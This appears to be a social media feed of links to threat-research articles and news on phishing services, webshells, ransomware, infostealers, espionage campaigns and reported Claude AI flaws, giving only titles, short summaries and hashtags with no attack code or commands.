AANew.
Sekoia: EvilTokens: an AI-augmented Phishing-as-a-Service for automating BEC fraud – Part 2 https://blog.sekoia.io/eviltokens-an-ai-augmented-phishing-as-a-service-for-automating-bec-fraud-part-2/ @sekoia_io #threatresearch #infosec
Microsoft posted this yesterday, if you missed it:
Microsoft: Cookie-controlled PHP webshells: A stealthy tradecraft in Linux hosting environments https://www.microsoft.com/en-us/security/blog/2026/04/02/cookie-controlled-php-webshells-tradecraft-linux-hosting-environments/ #infosec #Linux #Microsoft #threatresearch
Cookie-controlled PHP webshells: A stealthy tradecraft in Linux hosting environments | Microsoft Security Blog
Cookie-gated PHP webshells use obfuscation, php-fpm execution, and cron-based persistence to evade detection in Linux hosting environments. This post examines how this tradecraft conceals execution behind specially crafted HTTP cookies.
New.
WatchTower: You’re Not Supposed To ShareFile With Everyone (Progress ShareFile Pre-Auth RCE Chain CVE-2026-2699 & CVE-2026-2701) https://labs.watchtowr.com/youre-not-supposed-to-sharefile-with-everyone-progress-sharefile-pre-auth-rce-chain-cve-2026-2699-cve-2026-2701/
Recorded Future: Latin America and the Caribbean Cybercrime Landscape https://www.recordedfuture.com/research/latin-america-and-the-caribbean-cybercrime-landscape
Mandiant: vSphere and BRICKSTORM Malware: A Defender's Guide https://cloud.google.com/blog/topics/threat-intelligence/vsphere-brickstorm-defender-guide
Cisco: UAT-10608: Inside a large-scale automated credential harvesting operation targeting web applications https://blog.talosintelligence.com/uat-10608-inside-a-large-scale-automated-credential-harvesting-operation-targeting-web-applications/
Threat Fabric: The Malware Gap: Why Fraud & Security Controls Still Miss Mobile Malware https://www.threatfabric.com/blogs/the-malware-gap-why-fraud-security-controls-still-miss-mobile-malware
Abnormal Security: Meet VENOM: The PhaaS Platform That Neutralizes MFA https://abnormal.ai/blog/venom-phishing-campaign-mfa-credential-theft
From yesterday:
Zscaler: Anthropic Claude Code Leak https://www.zscaler.com/blogs/security-research/anthropic-claude-code-leak #infosec #threatresearch #vulnerability #malware #threatintel #threatintelligence
You’re Not Supposed To ShareFile With Everyone (Progress ShareFile Pre-Auth RCE Chain CVE-2026-2699 & CVE-2026-2701)
If you squint and look at the CISA KEV list, you might think it's made up exclusively of vulnerabilities in file transfer solutions. While this would be wrong (and you shouldn’t squint, it’s bad for your eyes), file transfer solutions do play a decent role in the CISA
I thought I saw this yesterday. 🤔
Halcyon: How One Letter Hid a Ransomware Army https://www.halcyon.ai/blog/how-one-letter-hid-a-ransomware-army-qilin
More:
Infosecurity-Magazine: Researchers Observe Sub-One-Hour Ransomware Attacks https://www.infosecurity-magazine.com/news/researchers-subonehour-ransomware/ #infosec #ransomware #threatresearch #cybercrime
Varonis, posted yesterday: A Quiet "Storm": Infostealer Hijacks Sessions, Decrypts Server-Side https://www.varonis.com/blog/storm-infostealer
More:
Infosecurity-Magazine: New 'Storm' Infostealer Remotely Decrypts Stolen Credentials https://www.infosecurity-magazine.com/news/storm-infostealer-remotely/ #infosec #threatresearch
New.
Group-IB: Hooking the Archipelago: Dissecting a Phishing Campaign Targeting Philippine Banking Users https://www.group-ib.com/blog/phisles-phishing-banks-philippines/
Any.Run: Major Cyber Attacks in March 2026: OAuth Phishing, SVG Smuggling, Magecart, and More https://any.run/cybersecurity-blog/major-cyber-attacks-march-2026/ @anyrun_app
Kaspersky: A laughing RAT: CrystalX combines spyware, stealer, and prankware features https://securelist.com/crystalx-rat-with-prankware-features/119283/
Halcyon: How One Letter Hid a Ransomware Army https://www.halcyon.ai/blog/how-one-letter-hid-a-ransomware-army-qilin #threatresearch #ransomware #infosec #phishing #scam #spyware #malware
New.
AhnLab: A malicious LNK that spreads a Python-based backdoor and how it’s spreading (Kimsuky group) https://asec.ahnlab.com/en/93151/ #infosec #threatresearch #Python #malware
New.
Proofpoint: I’d come running back to EU again: TA416 resumes European government espionage campaigns https://www.proofpoint.com/us/blog/threat-insight/id-come-running-back-eu-again-ta416-resumes-european-government-espionage
More:
Infosecurity-Magazine: Chinese Threat Actors Target European Governments in Espionage Campaigns https://www.infosecurity-magazine.com/news/china-hackers-ta416-europe/ #infosec #threatresearch #espionage
BlueVoyant, from yesterday: Unpacking Augmented Marauder’s Multi-Pronged Casbaneiro Campaigns https://www.bluevoyant.com/blog/augmented-marauders-multi-pronged-casbaneiro-campaigns
More:
The Hacker News: Casbaneiro Phishing Targets Latin America and Europe Using Dynamic PDF Lures https://thehackernews.com/2026/04/casbaneiro-phishing-targets-latin.html @thehackernews #infosec #malware #threatresearch
Hackread.comNew research shows 3 flaws dubbed #ClaudyDay in Claude AI could be chained to steal user data using fake Google Ads, hidden prompts, and built-in features.
Read: https://hackread.com/claudy-day-flaws-data-theft-fake-claude-ai-ads/
#CyberSecurity #AI #ClaudeAI #InfoSec #DataSecurity #ThreatResearch #Malware #Privacy
